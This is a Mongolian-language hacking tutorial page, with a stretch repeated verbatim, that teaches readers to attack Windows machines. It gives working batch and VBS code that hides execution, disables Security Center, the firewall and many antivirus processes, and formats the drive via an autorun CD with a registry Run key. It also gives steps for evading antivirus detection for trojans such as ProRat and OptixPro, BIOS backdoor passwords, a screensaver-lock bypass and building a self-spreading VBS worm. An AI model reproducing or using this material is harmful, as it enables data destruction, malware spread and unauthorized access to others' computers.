Crack хичээлүүд
бичсэн: Kearo төрөл: Компьютерын Хичээл
Batch File нууж ачааллах
Одоо хэрхэн яаж bat эсвэл cmd-г (Batch code) нууж ачааллахыг харуулая. Эхлээд та
txt editor нээгээд доорхи code-г бич. taniicode.bat гэдэгт та өөрийнхөө file нэрийг
өгөөд vbs өрөгтгөлтэйгөөр сануул.
Code:
Dim WshShell, x
Set WshShell = CreateObject("Wscript.shell")
x = WshShell.Run("%comspec% /c " & Chr(34) & WshShell.CurrentDirectory &
". aniicode.bat" & Chr(34),0,False)
Set WshShell = Nothing
ProRat crack
ProRat нь худалдан авахаас татгалзавал та энэ аргыг хэрэглэж болно. Free version-
ий server.exe-г өөрчөлсөний дараа ProRat-ийн Client өөрчилсөн байна гэж мэдээлэл
өгөөд холбогдох боломжгүй болдог. Тийм учраас AntiVirus-с нуухийн өмнө энхүү
Crack хийх хэрэгтэй. Ta эхлээд server.exe үүсгэ. Энэхүү server.exe upx-р шахагдсан
байгаа үүнийгээ буцаагаад UPX-р задал. Үүний дараа ProCracker v1.9.exe-г дууд.
(Maнай сангаас татаж аваарай) Анхаар заавал server.exe гэсэн нэртэй байна. Одоо
тэгээд AntiVirus-сээ нуу (Дээр бичсэн аргууд мөн болно) тэгээд буцаагаад UPX-р
шах.
Trojan OptixPro нуух
Та бүхэнд өнөөдөр хэрхэн Trojan OptixPro AntiVirus-с нуухийг харуулая.
1-рт Эхлээд OptixPro (Maнай сангаас татаж аваарай)
2-рт AV Devil2 Offset хайгч (Maнай сангаас татаж аваарай)
3-рт UPX exe шахагч эсвэл FSK (Maнай сангаас татаж аваарай)
За эхлээд та AntiVirus-аа хаа тэгээд өөрийнхөө server.exe-г үүсэг. Үүсгэхдээ UPX-р
шахахгүйгээр үүсгээрэй.
1-р арга Hexxen
Ингээд та одоо AV Devil2 offset хайгчийг нээгээд цffnen гэсэн товчлуур дээр дар.
Одоо өөрийнхөө үүсэгсэн server.exe-г оруулаж өг тэгээд Ok товч дар. Jetzt bitte beim
AV-Programm Auto-Project wieder einschalten. гэсэн цонх гарч ирэх үед AntiVirus-ээ
идвэхжүүл тэгээд Ok дар. Хэрэв энэ offset олдож байвал түүнийг тэмдэглэж аваад
HexEditor-р өөрчил. Олохгүй байх тохиолдол байна. Зарим нэг Antivirus програм
дээр Av Devil2 таарахгүйг анхаараарай! Kaspersky дээр бол 100% ажилдаг.
Таарахгүй тохиолдолд дээр миний бичсэн Virus-г AntiVirus-с нуух сэдэв дээр
бичсэн аргаар олож болно.
2-р арга Pack
За одоо server.exe-гээ UPX-р шахах хэрэгтэй. MS-DOS руу ороод UPX-г задалсан
Folder-луугаа ороод мөн тэнд өөрийнхөө server.exe хуулан оруул. upx -9 -o
server02.exe server.exe гэж өгөөд Enter дар. Эсвэл FSG-р шах. Өөр маш олон шахагч
бий туршиж үзэх хэрэгтэй альтохирсонийг нь та өөрөө сонгож аваарай.
Одоо тэгээд AntiVirus-ээрээ шалгаад үз.
Өөр маш олон арга бий жиш: stealth, crypt, bind, rootkit гэх мэт Хамгийн сайн арга
бол өөрөө Trojan бичсэн нь найдвартай!
Virus-г AntiVirus-с нуух
Virus-г AntiVirus-с нуухыг харуулая.
Эхлээд таньд Hex Workshop Tool мөн ямар нэгэн AntiVirus Program хэрэг болно.
Одоо өөрийнхөө AntiVirus-ээ хаах хэрэгтэй. Ингээд өөрийнхөө нуух гэж байгаа
Virus-ээ Hex Workshop-р нээ. Жишээ нь ийм байдалтай харагдана:
000005E8 | 504B 0304 1400 0000 0800 D409 | PK......0..E гэсэн мөр харагдана.
Энэ нэг ёсондоо таны Virus-нмй эх бие гэж хэлэж болно.
000005E8 энэ бол offset Энэ юу гэсэн үг вэ гэвэл Program-ийн хаяг юм.
504B 0304 1400 0000 0800 D409 гэдэг нь HEX code юм.
PK......0..E энэ бол HEХ Code-дод харяалагдах Тэмдэгт юм.
Program нь Virus хайхдаа энэ хаягийг олож өөрийн AntiVirus-ийн database-тай
харицуулан HEX code-г(эсвэл Тэмдэгийг) шалгадаг болно. Хэрэв тухайн хаяг
дээрэх HEX code AntiVirus-ийн database-тай таарч байвал Virus гэж үздэг. Xэрэв
HEX code нь таарахгүй байвал Virus биш байна гэж үздэг.
Одоо та талд нь ортол доош гүйлдгээд нэг ёсондоо 50% хүртэл үлдсэн доод
хэсэгийг арилгаад FILE/SAVE дар. Одоо тэгээд AntiVirus Program-аараа хайлгаад
үз. Хэрэв Virus олдов гэж байвал Virus-ний эх биеийн дээд хэсэгт AntiVirus Program
олож байна гэсэн үг. Хэрэв AntiVirus Program Virus олсонгүй гэвэл эх биеийн доод
хэсэгт байна гэсэн үг. Энэ хуваах аргаар хөөн олох хэрэгтэй. Хэрэв та (offset)
хаягыг олсон бол одоо HEX code (эсвэл Тэмдэгийг) өөрчлөх хэрэгтэй. Анхаарах
зүйл бол тэмдэгийг өөрчөлсөнөөр таны Virus ажиллахгүй болох алдаа өгөж магад.
Тэгэхлээр та зөв тэмдэгт өгж орлуулах хэрэгтэй.
Жиш: том Н байлаа гэхэд жижиг h орлуулах гэх мэт.
Бүр нарийн тэмдэгтүүдийг харая гэвэл та манай сангаас ASCII Table татаж авч
хараж болно. Мөн Hex Workshop татан аваарай.
BIOS Password Crack
Одоо та бүхэнд Bios Password-г хэрхэн Crack хийхийг харуулая.
Эхлээд энгийн аргаар үзэч хэрэгтэй. Зарим нэг BIOS master түлхүүр үгтэй байдаг
Award BIOS-д эдгээр түлхүүр үгийг өгөөд үз:
01322222
1EAAh
256256
589589
589721
?award
admin
alfarome
aLLy
aPAf
award
award_?
award.sw
AWARD SW
AWARD_SW
AWARD_PW
award_ps
AWARD?SW
awkward
BIOS
bios*
biostar
biosstar
CONCAT
CONDO
condo
djonet
efmukl
g6PJ
h6BB
HELGA-S
HEWITT RAND
HLT
j09F
j256
j262
j322
j64
lkw peter
lkwpeter
PASSWORD
SER
setup
SKY_FOX
SWITCHES_SW
Sxyz
SZYX
t0ch88
t0ch20x
ttptha
TTPTHA
TzqF
wodj
ZAAADA
zbaaaca
zjaaadc
zjaaade
Ami BIOS-д:
ami
amidecod
amipswd
AMIPSWD
AMI
A.M.I.
aammii
AMI~
amiami
AMI.KEY
AMISETUP
AMI?SW
AMI!SW
AMI_SW
bios310
BIOSPASS
CMOSPWD
KILLCMOS
589589
ami.kez
ami°
helgaЯs
HEWITT RAND
Vobis BIOS-д:
merlin
Advance Integration BIOS-д:
Advance
ALDI (Medion) BIOS-д:
medion
Amptron BIOS-д:
Polrty
AST BIOS-д:
SnuFG5
Biostar BIOS-д:
Biostar
Q54arwms
Concord BIOS-д:
last
CTX International:
CTX_123
CyberMax BIOS-д:
Congress
Daytek und Daewoo BIOS-д:
Daytec
Daewuu
DELL BIOS-д:
DELL
Digital Equipment BIOS-д:
komprie
Enox BIOS-д:
xo11nE
Epox BIOS-д:
central
Freetech BIOS-д:
Posterie
HP Vectra Serie BIOS-д:
hewlpack
IBM BIOS-д:
IBM
MBIUO
sertafu
Iwill BIOS-д:
iwill
Jet Way BIOS-д:
spoom1
Joss Technology BIOS-д:
57gbz6
Technolgi
MachSpeed BIOS-д:
sp99dd
Magic-Pro BIOS-д:
prost
Megastar BIOS-д:
Star
Micron BIOS-д:
sldkj754
xyzall
Micronics BIOS-д:
dn_04rjc
M Technology BIOS-д:
mMmM
Nimble BIOS-д:
xdfk9874t3
Packard Bell BIOS-д:
Bell9
QDI BIOS-д:
QDI
Quantex BIOS-д:
teX1
xljlbj
Research BIOS-д:
Col2ogro2
Shuttle BIOS-д:
Spacve
Siemens Nixdorf BIOS-д:
SKY_FOX
Speedeasy BIOS-д:
lesarot1
SuperMicro BIOS-д:
ksdjfg934t
TMC BIOS-д:
BIGO
Toshiba BIOS-д:
24Banc81
Toshiba
toshy99
Vextrec Technology BIOS-д:
Vextrec
WIMBIOSnbsp v2.10 BIOS-д:
Compleri
Zenith BIOS-д:
3098z
Zenith
Zeos BIOS-д:
zeosx
Compaq BIOS-д:
compaq
Tinys BIOS-д:
Tiny
IBM Aptiva BIOS-д:
Энэ BIOS-д Master түлхүүр үг байхгүй харин нэг арга байдаг. Компютер асаах үед
хулганыхаа хоёр товчлуурийг хамт дараад хүлээ.
Toshiba Laptops:
Энэ BIOS-д Master түлхүүр үг байхгүй харин нэг арга байдаг. Компютер асаах үед
зүүн талын Ctrl товч дараад хүлээ. Хэрэв эдгээр арга тус болохгүй бол мөн
бололцоотой бол Компютер онгойлгоод Jumper(анхаар) default болгох хэрэгтэй.15 -
60 Min буцаагаад хийх хэрэгтэй.
Өөр нэг арга бол MS-DOS-с арилгах арга юм:
debug
o 70 2E
o71 FF
Q
QBasic дээрээс бол:
10 OUT &H70,17
20 OUT &H71,0
AMI & Award Bios-д бол:
debug
o 70 17
o 71 17
Q
QBasic-с бол:
OUT &H70,&H17:OUT &H71,&H17
Хэрэв Assembler мэддэг бол:
mov dx, 070h
mov al, 02Eh
out dx, al
inc dx
xor al, al
out dx, al
Хэрэв та BIOS-оо дуудах аргаа мартсан бол
Del дарах AMI, Award
Esc дарах Toshiba
F1 дарах Toshiba; Phoenix; Late model PS/1 Value Point мөн 330s
F2 дарах NEC
F10 дарах RH corner of screen Compaq
Ins дарах IBM PS/2s w/ Reference Partition
Alt Enter дарах Dell
Alt ? дарах PS/2s
Ctrl-Esc дарах General
Ctrl Ins дарах PS/2s
Ctrl Alt Esc дарах AST Advantage, Award, Tandon
Ctrl Alt дарах General
Ctrl Alt S дарах Phoenix
Ctrl Alt Ins дарах Zenith, Phoenix
Ctrl S дарах Phoenix
Ctrl Shift Esc дарах Tandon 386
Shift Ctrl Alt Num Pad Del дарах Olivetti PC Pro
Setup disk-р орох хуучин Compaqs, Epson (Gemini), IBM, IBM PS/2, Toshiba, хуучин
286s
Мөн та Password-ийн мэдэж авахыг хүсвэл та манай сангаас Cmos password
recovery tools 4.5 татаж аваарай.
Энэ Tool нь:
- ACER/IBM BIOS
- AMI BIOS
- AMI WinBIOS 2.5
- Award 4.5x/4.6x/6.0
- Compaq (1992)
- Compaq (Шинээр гарсан)
- IBM (PS/2, Activa, Thinkpad)
- Packard Bell
- Phoenix 1.00.09.AC0 (1994), a486 1.03, 1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06 rev
1.13.1107
- Phoenix 4 release 6 (User)
- Gateway Solo - Phoenix 4.0 release 6
- Toshiba
- Zenith AMI
эдгээр BIOS-ийн түлхүүр үгийг олно.
VBS-р Link үүсгэх
Одоо та бүхэнд дэлгэц дээр Link үүсэгдэг *.vbs-г харуулая.
txt Editor нээгээд үүнийг бич:
Const strProgramtitel="Text Editor"
Const strProgram ="%SystemRoot%system32 otepad.exe"
Dim objShortcut
Dim objShell
Set objShell= WScript.CreateObject("Wscript.Shell")
strLPfad=objShell.SpecialFolders("Desktop")
Set objShortcut=objShell.CreateShortcut(strLPfad & "" & strProgramtitel & ".lnk")
objShortcut.TargetPath= strProgram
objShortcut.Description= "strProgramtitel"
objShortcut.Save
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод link.vbs гэсэн нэрээр хадагла.
Const strProgramtitel="Text Editor" (Нэр өгч байна)
Const strProgram ="ystemRootsystem32 otepad.exe" (ямар Program-г дуудах. Яг энд
та өөрийнхөө Virus-г өгөх хэрэгтэй)
...
strLPfad=objShell.SpecialFolders("Desktop") (Дэлгэц дээр)
Энхүү *.vbs нь Editor.exe-г дэлгэц дээр Link үүсгэж байна.
Windows XP SP2-ийн Security Center-ийг унтраах
Windows XP SP2-ийн Security Center-ийг унтраах Virus гэвэл txt Editor нээгээд
үүнийг бич:
@ECHO OFF
sc stop wscsvc>NUL
sc delete wscsvc>NUL
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод sckill.bat гэсэн нэрээр хадагла.
Windows XP SP2-ийн Firewall-ийг унтраах
Windows XP SP2-ийн Firewall-ийг унтраах Virus. Энэ нь Register-т өөрчлөлт
оруулдаг юм.
Одоо txt Editor нээгээд үүнийг бич:
@reg add
"HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicySta
ndardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f>NUL
@reg add
"HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicySta
ndardProfile" /v DoNotAllowExceptions /t REG_DWORD /d 00000000 /f>NUL
@reg add
"HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicySta
ndardProfile" /v DisableNotifications /t REG_DWORD /d 00000001 /f>NUL
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод fwkill.bat гэсэн нэрээр хадагла.
Та бүхэн эдгээр Virus-үүд DOS Batch Programming дээр хийгдэж байгааг харсан
байх.Энэ .bat File-г хэрхэн .exe болгож хөрвүүлэхийг дараа харуулна.
AntiVirus Test
Хэрэв та хамгийн бага хэмжээтэй Virus-г мэдэхийг хүсвэл txt Editor нээгээд үүнийг
бич:
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TESTFILE!$
H+H*
одоо тэгээд хадгалаад AntiVirus-ээрээ хайлгаад үз. Хэрэв Virus олдов гэж мэдээлэл
гарч байвал таны AntiVirus чинь зүгээр байна гэсэн үг. Энэ Virus нь ямарч хор
нөлөөгүй ба зөвхөн AntiVirus-г шалгахад зориулагдсан юм.
Passwort-тай Screensaver
Screensaver нь Passwort-р хамгаалагдсан компютерийг хэрхэн Crack-дах вэ гэвэл:
1-рт таньд 1 ширхэг CD
2-рт таньд CD бичигч(шарагч)
3-рт Text Editor
Та одоо ердийн нэг txt Editor нээгээд үүнийг бич.
[autorun]
open=screenkill.bat
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод autorun.inf гэсэн нэрээр хадагла.
Дахиад txt Editor нээгээд үүнийг бич:
@echo off
ren %windir%system sys
echo yamar neg tovtch dar
pause >nul
ren %windir%sys system
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод screenkill.bat гэсэн нэрээр хадагла.
Эдгээр 2 File-aa (autorun.inf, screenkill.bat) CD бичээд CD тоглуулагчид нь хий. Энэ
үед Screensaver алга болно. Одоо ямар нэг товч дар.(Заавал дарах ёстой шүү) За
энгээд та энэ компютер дээр бүрэн ажиллах боломжтой боллоо.
Batch Virus
Batch Virus хэрхэн бичих тухай та бүхэнд харуулая!(Анхаар маш болгоомжтой
ажилаарай)Энэ Virus-ний гол чиглэл нь format хийх юм.
1-рт таньд 1 ширхэг CD
2-рт таньд CD бичигч(шарагч)
3-рт Text Editor
4-рт Туршилтат орох Компютер
Та одоо ердийн нэг txt Editor нээгээд үүнийг бич.
[autorun]
open=autostart.bat
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод autorun.inf гэсэн нэрээр хадагла.
Дахиад txt Editor нээгээд үүнийг бич.
@echo off
ECHO REGEDIT4>%SystemRoot%urtgeh.reg
ECHO
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>
>%SystemRoot%urtgeh.reg
ECHO "Virus"="%SystemDrive%WindowsVirus.bat">>%SystemRoot%urtgeh.reg
regedit /s %SystemRoot%urtgeh.reg
ECHO @echo off>>%SystemRoot%Virus.bat
ECHO format %Homedrive% /u >nul>>%SystemRoot%Virus.bat
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод autostart.bat гэсэн нэрээр хадагла.
Эдгээр 2 File-aa (autorun.inf, autostart.bat) CD бичихдээ хамт нь оруулаж өгөх
хэрэгтэй. Эхний autorun.inf ямар нэг CD-г тоглуулагчид хийсэн тохиолдолд тухайн
өгсөн File-г Automat-р уншина гэсэн үг. Бидний тохиолдолд autostart.bat уншихаар
байна.
autostart.bat тайлбар:
@echo off - гэдэг нь бичигдэлийг нуух
ECHO REGEDIT4>%SystemRoot%urtgeh.reg
ECHO
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>
>%SystemRoot%urtgeh.reg
ECHO "Virus"="%SystemDrive%WindowsVirus.bat">>%SystemRoot%urtgeh.reg
- гэдэг нь burtgeh.reg File-г Windows Folder дотор үүсгэж байна.
regedit /s %SystemRoot%urtgeh.reg - гэдэг burtgeh.reg гэсэн File-г нууцаар
ачааллаж байна.(Register хийж байна) Ингэхээр burtgeh.reg File ийм байдалтай
болно.
REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Virus"="%SystemDrive%WindowsVirus.bat"
Энэ юу гэсэн үг вэ гэхлээр Автоматаар дараагийн удаа комютерийг ачааллах үед
Virus.bat гэсэн File-г дуудан ажилуулна.
ECHO @echo off>>%SystemRoot%Virus.bat
ECHO format %Homedrive% /u >nul>>%SystemRoot%Virus.bat - гэдэг нь Virus.bat
File-г Windows Folder дотор үүсгэж байна. Ингэхээр burtgeh.reg File ийм байдалтай
болно.
@echo off
format %Homedrive% /u >nul
Энэ юу гэсэн үг вэ гэхлээр Автоматаар Компютерийн үндсэн Hard-г Format хийж
байна. Үүнийг цааш улам боловсронгуй болгоорой.
Batch Virus ба AntiVirus FireWall унтраах
Batch ашиглан AntiVirus FireWall-г хэрхэн унтраадаг Virus-ний тухай та бүхэнд
харуулая!
Та одоо ердийн нэг txt Editor нээгээд үүнийг бич.
@echo off
taskkill /f /im NISUM.EXE
taskkill /f /im ccPxySvc.exe
taskkill /f /im navapsvc.exe
taskkill /f /im NPROTECT.EXE
taskkill /f /im SAVScan.exe
taskkill /f /im ccApp.exe
taskkill /f /im AVGCTRL.EXE
taskkill /f /im AVGUARD.EXE
taskkill /f /im AVWUPSRV.EXE
taskkill /f /im AVGNT.EXE
taskkill /f /im MSKSrvr.exe
taskkill /f /im avpcc.exe
taskkill /f /im avpm.exe
taskkill /f /im vsmon.exe
taskkill /f /im zapro.exe
taskkill /f /im mcvsrte.exe
taskkill /f /im mcshield.exe
taskkill /f /im mcagent.exe
taskkill /f /im mcvsshld.exe
taskkill /f /im fsgk32st.exe
taskkill /f /im FSGK32.EXE
taskkill /f /im fssm32.exe
taskkill /f /im fsbwsys.exe
taskkill /f /im FSMA32.EXE
taskkill /f /im FSMB32.EXE
taskkill /f /im FCH32.EXE
taskkill /f /im FAMEH32.EXE
taskkill /f /im fsav32.exe
taskkill /f /im fsdfwd.exe
taskkill /f /im FSM32.EXE
taskkill /f /im BackWeb-4476822.exe
taskkill /f /im _AVP32.exe
taskkill /f /im _AVPCC.exe
taskkill /f /im _AVPM.exe
taskkill /f /im _SMC.exe
taskkill /f /im ACKWIN32
taskkill /f /im ADMINTOOL.exe
taskkill /f /im ADVXDWIN.exe
taskkill /f /im AGENTA.exe
taskkill /f /im AGENTSVR.exe
taskkill /f /im ALERTSVC.exe
taskkill /f /im ALG.exe
taskkill /f /im ALOGSERV.exe
taskkill /f /im AMON.exe
taskkill /f /im AMON9X.exe
taskkill /f /im ANTITROJ.exe
taskkill /f /im ANTI-TROJAN.exe
taskkill /f /im ANTIVIRUS.exe
taskkill /f /im ANTS.exe
taskkill /f /im APIMONITOR.exe
taskkill /f /im APLICA32.exe
taskkill /f /im APVXDWIN.exe
taskkill /f /im ASHDISP.exe
taskkill /f /im ASHQUICK.exe
taskkill /f /im ATCON.exe
taskkill /f /im ATGUARD.exe
taskkill /f /im ATRO55EN.exe
taskkill /f /im ATUPDATER.exe
taskkill /f /im ATWATCH.exe
taskkill /f /im AUTODOWN.exe
taskkill /f /im AUTOTRACE.exe
taskkill /f /im AVCONSOL.exe
taskkill /f /im AVENGINE.exe
taskkill /f /im AVGCC32.exe
taskkill /f /im AVGCTRL.exe
taskkill /f /im AVGNT.exe
taskkill /f /im AVGSERV.exe
taskkill /f /im AVGSERV9.exe
taskkill /f /im AVGW.exe
taskkill /f /im AVKPOP.exe
taskkill /f /im AVKSERV.exe
taskkill /f /im AVKSERVICE.exe
taskkill /f /im AVKWCTL.exe
taskkill /f /im AVKWCTL9.exe
taskkill /f /im AVP.exe
taskkill /f /im AVP32.exe
taskkill /f /im AVPCC.exe
taskkill /f /im AVPM.exe
taskkill /f /im AVSCHED32.exe
taskkill /f /im AVSYNMGR.exe
taskkill /f /im AVWIN.exe
taskkill /f /im AVWINNT.exe
taskkill /f /im AVXGUI.exe
taskkill /f /im AVXLIVE.exe
taskkill /f /im AVXMONITOR9X.exe
taskkill /f /im AVXMONITORNT.exe
taskkill /f /im AVXW.exe
taskkill /f /im AVXQUAR.exe
taskkill /f /im BD_PROFESSIONAL.exe
taskkill /f /im BIDEF.exe
taskkill /f /im BIDSERVER.exe
taskkill /f /im BIPCP.exe
taskkill /f /im BISP.exe
taskkill /f /im BLACKD.exe
taskkill /f /im BLACKICE.exe
taskkill /f /im BOOTSCAN.exe
taskkill /f /im BOOTWARN.exe
taskkill /f /im BORG2.exe
taskkill /f /im BS120.exe
taskkill /f /im CCEVTMGR.exe
taskkill /f /im CDP.exe
taskkill /f /im CFGINTPR.exe
taskkill /f /im CFGWIZ.exe
taskkill /f /im CFIADMIN.exe
taskkill /f /im CFIAUDIT.exe
taskkill /f /im CFINET.exe
taskkill /f /im CFINET32.exe
taskkill /f /im CLAW95.exe
taskkill /f /im CLAW95CF.exe
taskkill /f /im CLEAN.exe
taskkill /f /im CLEANER.exe
taskkill /f /im CLEANER3.exe
taskkill /f /im CLEANPC.exe
taskkill /f /im CMGRDIAN.exe
taskkill /f /im CMON016.exe
taskkill /f /im CONNECTIONMONITOR.exe
taskkill /f /im CPF9X206.exe
taskkill /f /im CPFNT206.exe
taskkill /f /im CTRL.exe
taskkill /f /im CV.exe
taskkill /f /im CWNB181.exe
taskkill /f /im CWNTDWMO.exe
taskkill /f /im DEFSCANGUI.exe
taskkill /f /im DEFWATCH.exe
taskkill /f /im DEPUTY.exe
taskkill /f /im DOORS.exe
taskkill /f /im DPATROL.exe
taskkill /f /im DPF.exe
taskkill /f /im DRWEB32.exe
taskkill /f /im DRWEBSCD.exe
taskkill /f /im DVP95.exe
taskkill /f /im DVP95_0.exe
taskkill /f /im ECENGINE.exe
taskkill /f /im EFPEADM.exe
taskkill /f /im ENT.exe
taskkill /f /im ESAFE.exe
taskkill /f /im ESCANH95.exe
taskkill /f /im ESCANHNT.exe
taskkill /f /im ESCANV95.exe
taskkill /f /im ESPWATCH.exe
cls
exit
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод untraah.bat гэсэн нэрээр хадагла.
taskkill /f /im blabla.exe Энэ юу гэсэн үг вэ гэхлээр blabla.exe гэсэн Program-ийг
aсуухгүйгээр унтраа гэсэн үг юм.
Та бүхэн өөрийн мэдэх AntiVirus мөн Firewall нэмэж улам сайжруулаж болно.
Visual Basic Worm хийх
Program-н хэл мэддэгүй хүмүүст зориулан хэрхэн VB worm/virus хийх талаар
харуулая. Таньд юуны өмнө Vbswg 2 Beta гэсэн Tool байхад болно. Та одоо манай
сангаас татаж аваад задлаад Vbswg.exe дууд.
Одоо та өөрийн үүсгэх гэж буй Worm-доо нэр өг worm Name гэдэг дээр. File Name
гэдэг мөн нэр өг. jpg.vbs гэсэн нь нэгэн хууралт юм. Нэг ёсондоо jpg гэсэн зураг
мэт харагдах болно гэсэн үг. Одоо та Startup гэдэг дээр дар. Энэ юу гэсэн үг вэ
гэхлээр дараагын удаа компютер асхад дахин Worm-оо ажиллуулахаар болгож
байна.
Одоо та E-Mail дээр дар. Энэ таны Worm нь Outlook-г ашиглан тархана гэсэн үг.
Одоо та IRC дээр дар. энэ таны Worm нь IRC-г (mIRC chat) ашиглан тархана гэсэн
үг.
Одоо та Infect дээр дар. Энэ таны Worm нь бусад vbs file-уудад халдана тархана
гэсэн үг.
Одоо та Payload дээр дар. Энэ одоо таны Worm-ийн халдварлагдсан компютерт
хийх үйл ажилгаа гэсэн үг.
Show message гэдэг мэдээлэлийн цонх харуулана гэсэн үг.
Goto Url гэдэг нь Internet хуудас дуудана.
Change Registered owner name гэдэг нь хэрэглэгчийн нэрийг өөрчөлнө гэсэн үг.
Shut Down гэдэг нь компютерийг унтраана.
Random гэдэг энэ worm маань хэдэн удаа үйлдэлээ давтахийг зааж өгч байна.
Date гэдэг энэ worm маань хэдэн сарийн хэддэх өдөр идвэхжихийг зааж өгч байна.
Та бүхэн тэгээд Extras ашиглан улам сайжруулаж болно. Одоо Generate дараад л
боллоо.
CRACKER
Cracker гэдэг нь товч үгээр: Комютерлуу нэвтрэн орож хохирол учруулах мөн ямар
нэг прогаммд өөрчлөлт оруулах эсвэл эвдлэн сүйтгэх.
Одоо хэрхэн яаж bat эсвэл cmd-г (Batch code) нууж ачааллахыг харуулая. Эхлээд та
txt editor нээгээд доорхи code-г бич. taniicode.bat гэдэгт та өөрийнхөө file нэрийг
өгөөд vbs өрөгтгөлтэйгөөр сануул.
Code:
Dim WshShell, x
Set WshShell = CreateObject("Wscript.shell")
x = WshShell.Run("%comspec% /c " & Chr(34) & WshShell.CurrentDirectory &
". aniicode.bat" & Chr(34),0,False)
Set WshShell = Nothing
ProRat crack
ProRat нь худалдан авахаас татгалзавал та энэ аргыг хэрэглэж болно. Free version-
ий server.exe-г өөрчөлсөний дараа ProRat-ийн Client өөрчилсөн байна гэж мэдээлэл
өгөөд холбогдох боломжгүй болдог. Тийм учраас AntiVirus-с нуухийн өмнө энхүү
Crack хийх хэрэгтэй. Ta эхлээд server.exe үүсгэ. Энэхүү server.exe upx-р шахагдсан
байгаа үүнийгээ буцаагаад UPX-р задал. Үүний дараа ProCracker v1.9.exe-г дууд.
(Maнай сангаас татаж аваарай) Анхаар заавал server.exe гэсэн нэртэй байна. Одоо
тэгээд AntiVirus-сээ нуу (Дээр бичсэн аргууд мөн болно) тэгээд буцаагаад UPX-р
шах.
Trojan OptixPro нуух
Та бүхэнд өнөөдөр хэрхэн Trojan OptixPro AntiVirus-с нуухийг харуулая.
1-рт Эхлээд OptixPro (Maнай сангаас татаж аваарай)
2-рт AV Devil2 Offset хайгч (Maнай сангаас татаж аваарай)
3-рт UPX exe шахагч эсвэл FSK (Maнай сангаас татаж аваарай)
За эхлээд та AntiVirus-аа хаа тэгээд өөрийнхөө server.exe-г үүсэг. Үүсгэхдээ UPX-р
шахахгүйгээр үүсгээрэй.
1-р арга Hexxen
Ингээд та одоо AV Devil2 offset хайгчийг нээгээд цffnen гэсэн товчлуур дээр дар.
Одоо өөрийнхөө үүсэгсэн server.exe-г оруулаж өг тэгээд Ok товч дар. Jetzt bitte beim
AV-Programm Auto-Project wieder einschalten. гэсэн цонх гарч ирэх үед AntiVirus-ээ
идвэхжүүл тэгээд Ok дар. Хэрэв энэ offset олдож байвал түүнийг тэмдэглэж аваад
HexEditor-р өөрчил. Олохгүй байх тохиолдол байна. Зарим нэг Antivirus програм
дээр Av Devil2 таарахгүйг анхаараарай! Kaspersky дээр бол 100% ажилдаг.
Таарахгүй тохиолдолд дээр миний бичсэн Virus-г AntiVirus-с нуух сэдэв дээр
бичсэн аргаар олож болно.
2-р арга Pack
За одоо server.exe-гээ UPX-р шахах хэрэгтэй. MS-DOS руу ороод UPX-г задалсан
Folder-луугаа ороод мөн тэнд өөрийнхөө server.exe хуулан оруул. upx -9 -o
server02.exe server.exe гэж өгөөд Enter дар. Эсвэл FSG-р шах. Өөр маш олон шахагч
бий туршиж үзэх хэрэгтэй альтохирсонийг нь та өөрөө сонгож аваарай.
Одоо тэгээд AntiVirus-ээрээ шалгаад үз.
Өөр маш олон арга бий жиш: stealth, crypt, bind, rootkit гэх мэт Хамгийн сайн арга
бол өөрөө Trojan бичсэн нь найдвартай!
Virus-г AntiVirus-с нуух
Virus-г AntiVirus-с нуухыг харуулая.
Эхлээд таньд Hex Workshop Tool мөн ямар нэгэн AntiVirus Program хэрэг болно.
Одоо өөрийнхөө AntiVirus-ээ хаах хэрэгтэй. Ингээд өөрийнхөө нуух гэж байгаа
Virus-ээ Hex Workshop-р нээ. Жишээ нь ийм байдалтай харагдана:
000005E8 | 504B 0304 1400 0000 0800 D409 | PK......0..E гэсэн мөр харагдана.
Энэ нэг ёсондоо таны Virus-нмй эх бие гэж хэлэж болно.
000005E8 энэ бол offset Энэ юу гэсэн үг вэ гэвэл Program-ийн хаяг юм.
504B 0304 1400 0000 0800 D409 гэдэг нь HEX code юм.
PK......0..E энэ бол HEХ Code-дод харяалагдах Тэмдэгт юм.
Program нь Virus хайхдаа энэ хаягийг олож өөрийн AntiVirus-ийн database-тай
харицуулан HEX code-г(эсвэл Тэмдэгийг) шалгадаг болно. Хэрэв тухайн хаяг
дээрэх HEX code AntiVirus-ийн database-тай таарч байвал Virus гэж үздэг. Xэрэв
HEX code нь таарахгүй байвал Virus биш байна гэж үздэг.
Одоо та талд нь ортол доош гүйлдгээд нэг ёсондоо 50% хүртэл үлдсэн доод
хэсэгийг арилгаад FILE/SAVE дар. Одоо тэгээд AntiVirus Program-аараа хайлгаад
үз. Хэрэв Virus олдов гэж байвал Virus-ний эх биеийн дээд хэсэгт AntiVirus Program
олож байна гэсэн үг. Хэрэв AntiVirus Program Virus олсонгүй гэвэл эх биеийн доод
хэсэгт байна гэсэн үг. Энэ хуваах аргаар хөөн олох хэрэгтэй. Хэрэв та (offset)
хаягыг олсон бол одоо HEX code (эсвэл Тэмдэгийг) өөрчлөх хэрэгтэй. Анхаарах
зүйл бол тэмдэгийг өөрчөлсөнөөр таны Virus ажиллахгүй болох алдаа өгөж магад.
